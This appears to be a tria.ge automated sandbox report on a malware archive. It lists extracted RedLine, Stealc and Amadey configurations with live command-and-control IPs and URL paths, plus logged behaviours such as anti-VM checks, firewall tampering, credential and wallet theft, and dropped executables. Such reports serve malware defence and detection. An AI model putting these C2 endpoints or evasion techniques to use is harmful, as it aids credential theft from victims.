Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
2699s -
max time network
2693s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
12/07/2024, 23:32
Static task
static1
Behavioral task
behavioral1
Sample
archive.zip
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
archive.zip
Resource
win11-20240709-en
General
-
Target
archive.zip
-
Size
14.0MB
-
MD5
aa3be7accc9a612ce95fcede2a64d791
-
SHA1
76bab53214bef8715658e47a01e14b9efc91cea9
-
SHA256
d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4
-
SHA512
dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4
-
SSDEEP
393216:WxovLlzWh46e8jm2KaxKhHK2VKaiKdWKn9KK:aov5246e8jjKaxKhHK2VKaiKdWKn9KK
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
77.105.135.107:3445
Extracted
stealc
hate
http://85.28.47.30
-
url_path
/920475a59bac849d.php
Extracted
amadey
4.30
4dd39d
http://77.91.77.82
-
install_dir
ad40971b6b
-
install_file
explorti.exe
-
strings_key
a434973ad22def7137dbb5e059b7081e
-
url_paths
/Hun4Ko/index.php
Signatures
-
Modifies firewall policy service 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" Setup.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" Setup.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" Setup.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4468-251-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 42 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JJECAAEHCF.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 289 5252 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 236 powershell.exe 5532 powershell.EXE 5844 powershell.EXE 4768 powershell.exe 5872 powershell.exe 4208 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JJECAAEHCF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation OklvlTo.exe Key value queried \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation AXChDNl.exe -
Executes dropped EXE 64 IoCs
pid Process 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 1096 dz_LhQg5VnMy0wlI_6dK0bLe.exe 3980 KAIgHVGHtDFBzfjGkrU7kU8s.exe 2848 cJGyky9EhCckJumZf6fkM6G5.exe 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3724 1vI2dSu9Otp3tPl9bmA85PJf.exe 564 5XopSKg9PUSZohSIWN2v9xOT.exe 3164 yhHzUVDC2pAw9goJepU_qORY.exe 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 1032 Install.exe 1252 Install.exe 2636 goldenmusicalvariety32_64.exe 5104 Install.exe 1492 Install.exe 1524 goldenmusicalvariety32_64.exe 5056 JJECAAEHCF.exe 4208 explorti.exe 1472 eqtpkqwqodik.exe 4824 67f535e337.exe 2212 b9fcde3053.exe 5180 Install.exe 5204 Install.exe 5224 explorti.exe 5756 BFCFBFBFBK.exe 6004 KFIJJJEBGC.exe 6072 OklvlTo.exe 648 AXChDNl.exe 3512 explorti.exe 5528 explorti.exe 3480 explorti.exe 5692 explorti.exe 5240 explorti.exe 6004 explorti.exe 5308 explorti.exe 1548 explorti.exe 3580 abQaeBLwmX9V57tLKTE3eOuX.exe 6036 av_cOAXWNrelQa039CGbm0A1.exe 4912 IRrr6YljmO8hEIxi45BS9F3G.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 1868 6_8BpX05xBxPNdxoMR3fjLwI.exe 5832 kJjL0w6C70s0bwCeRI5o95qa.exe 5504 cRS5O_os57KVEKl2I6n_mlOZ.exe 2364 sxM96ISlNbOtGCb6tmhTPqMM.exe 6048 7NybowgkTtFNZ6zV5tAShfiu.exe 1784 av_cOAXWNrelQa039CGbm0A1.tmp 5108 eqtpkqwqodik.exe 1892 explorti.exe 1304 explorti.exe 1848 explorti.exe 4896 explorti.exe 976 explorti.exe 2016 explorti.exe 6036 explorti.exe 6016 explorti.exe 4948 explorti.exe 2836 explorti.exe 5324 explorti.exe 3324 explorti.exe 4912 explorti.exe 5076 explorti.exe 3876 explorti.exe -
Identifies Wine through registry keys 2 TTPs 42 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine JJECAAEHCF.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine explorti.exe -
Loads dropped DLL 9 IoCs
pid Process 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 3656 MSBuild.exe 3656 MSBuild.exe 2124 MSBuild.exe 2124 MSBuild.exe 5252 rundll32.exe 1784 av_cOAXWNrelQa039CGbm0A1.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 141.98.234.31 -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json OklvlTo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json OklvlTo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json AXChDNl.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini OklvlTo.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 50 iplogger.org 65 iplogger.org 297 iplogger.org 387 iplogger.org -
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 api.myip.com 9 api.myip.com 10 ipinfo.io 298 api.myip.com 320 ipinfo.io 346 api.myip.com 347 ipinfo.io 2 ipinfo.io 431 api.myip.com 432 ipinfo.io -
Power Settings 1 TTPs 16 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3672 powercfg.exe 708 powercfg.exe 3348 powercfg.exe 2384 powercfg.exe 5560 powercfg.exe 3980 powercfg.exe 2800 powercfg.exe 1220 powercfg.exe 5204 powercfg.exe 1816 powercfg.exe 4404 powercfg.exe 2636 powercfg.exe 1620 powercfg.exe 2112 powercfg.exe 3680 powercfg.exe 5400 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000100000002aa7e-725.dat autoit_exe -
Drops file in System32 directory 47 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE OklvlTo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OklvlTo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AXChDNl.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 OklvlTo.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Setup.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Setup.exe File opened for modification C:\Windows\System32\GroupPolicy Setup.exe File opened for modification C:\Windows\System32\GroupPolicy Setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 OklvlTo.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini Setup.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 OklvlTo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy Setup.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 OklvlTo.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 OklvlTo.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini Setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Setup.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini Setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 OklvlTo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OklvlTo.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 OklvlTo.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 48 IoCs
